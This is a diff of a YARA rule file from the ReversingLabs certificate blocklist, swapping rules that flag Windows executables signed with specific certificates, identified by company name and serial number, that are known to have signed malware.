+rule REVERSINGLABS_Cert_Blocklist_08D4352185317271C1Cec9D05C279Af7 : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "324b2e2f-bad7-5ac4-864c-044d99fa01dc"
+		id = "0165920f-5f4d-5b35-990d-120786b4c5ba"
 		date = "2023-11-08"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L12684-L12702"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "4ac17d0f0e4ef2bb5f6cda8e7cb07a641d49c83465a0a80c46ff6e0e752d1847"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L5598-L5614"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "b240962ab23729b241413ed1e53ac6541bf6b8a673c57522efd0cfe0c7eb9dd4"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -16375,21 +41040,21 @@ rule REVERSINGLABS_Cert_Blocklist_D5690D94F15315E143Db10Af35497Dc5 : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "PET SERVICES d.o.o." and ( pe.signatures [ i ] . serial == "00:d5:69:0d:94:f1:53:15:e1:43:db:10:af:35:49:7d:c5" or pe.signatures [ i ] . serial == "d5:69:0d:94:f1:53:15:e1:43:db:10:af:35:49:7d:c5" ) and 1576195200 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Retalit LLC" and pe.signatures [ i ] . serial == "08:d4:35:21:85:31:72:71:c1:ce:c9:d0:5c:27:9a:f7" and 1596585601 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_8223C74185Add0927246F5E33Ebac467 : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_B514E4C5309Ef9F27Add05Bedd4339A0 : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "dfe87130-7b2f-5f8a-8c2d-8653c2bd0cd3"
+		id = "4b5abcfe-259e-5029-822b-c191b8d2c607"
 		date = "2023-11-08"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L12704-L12722"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "f700b4f7cdfda9f678c3a5259d4293640c50567ec277c5b3db69756534e2007f"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L5616-L5634"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "665b280218528bbe3d5c65d043266469e5288587ed9d85d01797bef7ce132a6f"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -16399,21 +41064,21 @@ rule REVERSINGLABS_Cert_Blocklist_8223C74185Add0927246F5E33Ebac467 : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "TOV Virikton" and ( pe.signatures [ i ] . serial == "00:82:23:c7:41:85:ad:d0:92:72:46:f5:e3:3e:ba:c4:67" or pe.signatures [ i ] . serial == "82:23:c7:41:85:ad:d0:92:72:46:f5:e3:3e:ba:c4:67" ) and 1463616000 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "SCABONE PTY LTD" and ( pe.signatures [ i ] . serial == "00:b5:14:e4:c5:30:9e:f9:f2:7a:dd:05:be:dd:43:39:a0" or pe.signatures [ i ] . serial == "b5:14:e4:c5:30:9e:f9:f2:7a:dd:05:be:dd:43:39:a0" ) and 1572566400 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_Dd9E9E1D7C573714E3F567C5380Ae6D0 : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_13C7B92282Aae782Bfb00Baf879935F4 : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "72745795-0261-5b7b-b25e-8220bced90ec"
+		id = "cc147c06-e0cf-5536-be3c-17e838b346a9"
 		date = "2023-11-08"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L12724-L12742"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "7bbcdb989d53bafbb2bdb694be72d4f7305323c01e8f1eafcb7cd889df165ff6"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L5636-L5652"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "d4edbb446a51e5153ba88d6757d5fb610303eac3fd4bdd3b987b508dc618d2dc"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -16423,21 +41088,21 @@ rule REVERSINGLABS_Cert_Blocklist_Dd9E9E1D7C573714E3F567C5380Ae6D0 : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "CREA&COM d.o.o." and ( pe.signatures [ i ] . serial == "00:dd:9e:9e:1d:7c:57:37:14:e3:f5:67:c5:38:0a:e6:d0" or pe.signatures [ i ] . serial == "dd:9e:9e:1d:7c:57:37:14:e3:f5:67:c5:38:0a:e6:d0" ) and 1575849600 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "THE WIZARD GIFT CORPORATION" and pe.signatures [ i ] . serial == "13:c7:b9:22:82:aa:e7:82:bf:b0:0b:af:87:99:35:f4" and 1603130510 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_3D5E71 : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_D627F1000D12485995514Bfbdefc55D9 : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "7180b20d-f367-5260-88cd-dd2a1269f89b"
+		id = "4696fc12-16b7-575f-b90f-aa0a5cc12852"
 		date = "2023-11-08"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L12744-L12760"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "aa73ac6569e4bb0084d7b148b2186ec2737a691a133319b21b666aa16bca9f2d"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L5654-L5672"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "7ca590d71997879d17054a936238dd5273a52f3438d1b231a75927abfb118ffd"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -16447,21 +41112,21 @@ rule REVERSINGLABS_Cert_Blocklist_3D5E71 : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "OF.PL sp. z o.o." and pe.signatures [ i ] . serial == "3d:5e:71" and 1066997730 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "THREE D CORPORATION PTY LTD" and ( pe.signatures [ i ] . serial == "00:d6:27:f1:00:0d:12:48:59:95:51:4b:fb:de:fc:55:d9" or pe.signatures [ i ] . serial == "d6:27:f1:00:0d:12:48:59:95:51:4b:fb:de:fc:55:d9" ) and 1597622400 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_C33187Fe848A65E8484Ea492Cb2Cbb18 : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_5Fb6Bae8834Edd8D3D58818Edc86D7D7 : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "fa05113a-a21e-5f21-aae3-b646e5b42dfb"
+		id = "52b11933-f22c-53ea-88b7-75b3242907dd"
 		date = "2023-11-08"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L12762-L12780"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "b66d67b74d73a143cb5301b232abd5f0f84f058223d4494b924a25dffb49037a"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L5674-L5690"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "a8cec0479bfd53f34e291d56538187c05375e80d20af7f0af08f0db8e1d6ed22"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -16471,21 +41136,21 @@ rule REVERSINGLABS_Cert_Blocklist_C33187Fe848A65E8484Ea492Cb2Cbb18 : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "SELCUK GUNDOGDU" and ( pe.signatures [ i ] . serial == "00:c3:31:87:fe:84:8a:65:e8:48:4e:a4:92:cb:2c:bb:18" or pe.signatures [ i ] . serial == "c3:31:87:fe:84:8a:65:e8:48:4e:a4:92:cb:2c:bb:18" ) and 1426204800 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Tramplink LLC" and pe.signatures [ i ] . serial == "5f:b6:ba:e8:83:4e:dd:8d:3d:58:81:8e:dc:86:d7:d7" and 1600781989 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_6Fc143Ba34Cabf1De7A4C7F8F4Cdad6D : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_E5Ad42C509A7C24605530D35832C091E : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "546692ed-2506-56ad-b678-e74b857380a3"
+		id = "29b1803e-90ee-5390-9548-20b24a3de218"
 		date = "2023-11-08"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L12782-L12798"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "ffe25e4478a2245d4e5b330bb9300fb6cb48afb0fe3bd72bd62a589eeee3fe89"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L5692-L5710"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "2d57d1c171734d0da167ce7eba47aecd88cd15063488d79659804c6c2fae00a2"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -16495,21 +41160,21 @@ rule REVERSINGLABS_Cert_Blocklist_6Fc143Ba34Cabf1De7A4C7F8F4Cdad6D : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "World Telecom International Inc." and pe.signatures [ i ] . serial == "6f:c1:43:ba:34:ca:bf:1d:e7:a4:c7:f8:f4:cd:ad:6d" and 1147046400 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "VESNA, OOO" and ( pe.signatures [ i ] . serial == "00:e5:ad:42:c5:09:a7:c2:46:05:53:0d:35:83:2c:09:1e" or pe.signatures [ i ] . serial == "e5:ad:42:c5:09:a7:c2:46:05:53:0d:35:83:2c:09:1e" ) and 1600786458 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_6Ac6268B2E431A2C1369346D175D0E30 : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_8E3D89C682F7C0Dad70110Cb7B7C8263 : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "12664460-19e1-5b73-8299-cfe19dffc0b4"
+		id = "1adc776c-1549-5149-bd2f-81920a8d7255"
 		date = "2023-11-08"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L12800-L12816"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "27efaba9bd9cd116f640007c1e951bb77757efbe148b5f953e71d6621d7f16b2"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L5712-L5730"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "a0f42c5492469e7f132b000aead2d674fed4ea9c0e168579fd55a6c89b45ae4d"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -16519,21 +41184,21 @@ rule REVERSINGLABS_Cert_Blocklist_6Ac6268B2E431A2C1369346D175D0E30 : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Install Sync" and pe.signatures [ i ] . serial == "6a:c6:26:8b:2e:43:1a:2c:13:69:34:6d:17:5d:0e:30" and 1436140800 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "WORK PLACEMENTS INTERNATIONAL LIMITED" and ( pe.signatures [ i ] . serial == "00:8e:3d:89:c6:82:f7:c0:da:d7:01:10:cb:7b:7c:82:63" or pe.signatures [ i ] . serial == "8e:3d:89:c6:82:f7:c0:da:d7:01:10:cb:7b:7c:82:63" ) and 1570626662 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_0Fc4D9178B8Df2C19E269Ac6F43Dd708 : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_Ef2D35F2Ae82A767A16Be582Ab0D1Ba0 : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "b336ff6c-d94e-5715-bb97-6b60cda90911"
+		id = "dc8f49b8-fda2-510c-8374-3261e75d11a9"
 		date = "2023-11-08"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L12818-L12834"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "41dfe37b464d337268a8bb0e23124df7b50ab966038e8ad33bda81a4d86040ca"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L5732-L5750"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "0709290aeb18bcb855518e150c2768c24ab311f5c727cdc4c40145b879ff88b6"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -16543,21 +41208,21 @@ rule REVERSINGLABS_Cert_Blocklist_0Fc4D9178B8Df2C19E269Ac6F43Dd708 : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "PK Partnership, OOO" and pe.signatures [ i ] . serial == "0f:c4:d9:17:8b:8d:f2:c1:9e:26:9a:c6:f4:3d:d7:08" and 1466553600 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Workstage Limited" and ( pe.signatures [ i ] . serial == "00:ef:2d:35:f2:ae:82:a7:67:a1:6b:e5:82:ab:0d:1b:a0" or pe.signatures [ i ] . serial == "ef:2d:35:f2:ae:82:a7:67:a1:6b:e5:82:ab:0d:1b:a0" ) and 1567123200 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_E01407871E2146C9Baab1Ae7Ab8Ab172 : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_039668034826Df47E6207Ec9Daed57C3 : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "229772ae-68a2-566b-bf61-988cb41d7d8f"
+		id = "c2a3477a-a4cf-586e-ba70-555cc577ab2c"
 		date = "2023-11-08"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L12836-L12854"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "1801e7f15bd5f916fc08d263a845d296d334ca9de1040008f619719c1b5c0a3b"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L5752-L5768"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "792860feec6e599ba22ae3869ef132cf5b7be2e0572e23503e293444fd7c382d"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -16567,21 +41232,21 @@ rule REVERSINGLABS_Cert_Blocklist_E01407871E2146C9Baab1Ae7Ab8Ab172 : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "TOV Intalev Ukraina" and ( pe.signatures [ i ] . serial == "00:e0:14:07:87:1e:21:46:c9:ba:ab:1a:e7:ab:8a:b1:72" or pe.signatures [ i ] . serial == "e0:14:07:87:1e:21:46:c9:ba:ab:1a:e7:ab:8a:b1:72" ) and 1464220800 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "CHOO FSP, LLC" and pe.signatures [ i ] . serial == "03:96:68:03:48:26:df:47:e6:20:7e:c9:da:ed:57:c3" and 1601424001 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_Effc6D19D6Fc85872E4E5B3Ccee6D301 : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_07Bb6A9D1C642C5973C16D5353B17Ca4 : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "56114e31-2e9b-5d16-8435-708bbb2687cc"
+		id = "094a02ee-394b-5989-9f73-6b942aca5500"
 		date = "2023-11-08"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L12856-L12874"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "a746c4193f1264cb96eae0ea85c2c76b5caf3b72ca950f76af426b4d68d210b3"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L5770-L5786"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "b98dcd4f0ebe870a9dad55cac5b0db81be6062216337b75a74a0aff8436df57f"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -16591,21 +41256,21 @@ rule REVERSINGLABS_Cert_Blocklist_Effc6D19D6Fc85872E4E5B3Ccee6D301 : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "C\\xC3\\x93IR IP LIMITED" and ( pe.signatures [ i ] . serial == "00:ef:fc:6d:19:d6:fc:85:87:2e:4e:5b:3c:ce:e6:d3:01" or pe.signatures [ i ] . serial == "ef:fc:6d:19:d6:fc:85:87:2e:4e:5b:3c:ce:e6:d3:01" ) and 1572307200 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "MADAS d.o.o." and pe.signatures [ i ] . serial == "07:bb:6a:9d:1c:64:2c:59:73:c1:6d:53:53:b1:7c:a4" and 1601856001 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_2F4A25D52B16Eb4C9Dfe71Ebbd8121Bb : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_0A1Dc99E4D5264C45A5090F93242A30A : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "1afd5d2b-fd6d-58ca-b966-788d465cd0ed"
+		id = "9b85ed8d-ddda-51d0-bfac-5cdc6e4fd94f"
 		date = "2023-11-08"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L12876-L12892"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "7b237ae0574afeafcc05f71512c09d3170edbee20e512a1b0af5b431923dc25c"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L5788-L5804"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "1985c9c4f4a93c3088eaec3031df93cf87a9d7ee36b94322330caf3c21982f3c"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -16615,21 +41280,21 @@ rule REVERSINGLABS_Cert_Blocklist_2F4A25D52B16Eb4C9Dfe71Ebbd8121Bb : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Blist LLC" and pe.signatures [ i ] . serial == "2f:4a:25:d5:2b:16:eb:4c:9d:fe:71:eb:bd:81:21:bb" and 1629763200 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "K & D KOMPANI d.o.o." and pe.signatures [ i ] . serial == "0a:1d:c9:9e:4d:52:64:c4:5a:50:90:f9:32:42:a3:0a" and 1600905601 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_6889Aab6202Bcc5F11Caedf4D04F435B : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_018093Cfad72Cdf402Eecbe18B33Ec71 : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "d4499a1d-aa8d-5056-ad91-439f27f00c33"
+		id = "d9ab2e5c-a107-53c1-9b8d-b4625eed03b0"
 		date = "2023-11-08"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L12894-L12910"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "b2261ed8001929be8f80f73cc0c5076138f4794c73cbffd63773da5fc44639a8"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L5806-L5822"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "ac398ef89e691158742598777c320832a750a7410904448778afc7ef3c63c255"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -16639,21 +41304,21 @@ rule REVERSINGLABS_Cert_Blocklist_6889Aab6202Bcc5F11Caedf4D04F435B : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "C4DL Media" and pe.signatures [ i ] . serial == "68:89:aa:b6:20:2b:cc:5f:11:ca:ed:f4:d0:4f:43:5b" and 1231891200 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "FAT11 d.o.o." and pe.signatures [ i ] . serial == "01:80:93:cf:ad:72:cd:f4:02:ee:cb:e1:8b:33:ec:71" and 1602000390 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_3Be63083Fbb1787B445Da97583721419 : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_569E03988Af60D80Ce60728940850D9B : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "6839595d-b645-5963-bd96-a668bfdd667f"
+		id = "a4432990-8c2f-523c-8a9d-cba578aaefc5"
 		date = "2023-11-08"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L12912-L12928"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "f39f5a632544bc01c3b4c9e2f2dd33f7109c44375f54011a34181e10da79debc"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L5824-L5842"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "3ea894d9e088c2123f9ec87cbf097e2275fae18cad26e926641fe64921808b1e"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -16663,21 +41328,21 @@ rule REVERSINGLABS_Cert_Blocklist_3Be63083Fbb1787B445Da97583721419 : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "\"SMART GREY\" LLC" and pe.signatures [ i ] . serial == "3b:e6:30:83:fb:b1:78:7b:44:5d:a9:75:83:72:14:19" and 1493942400 <= pe.signatures [ i ] . not_after )
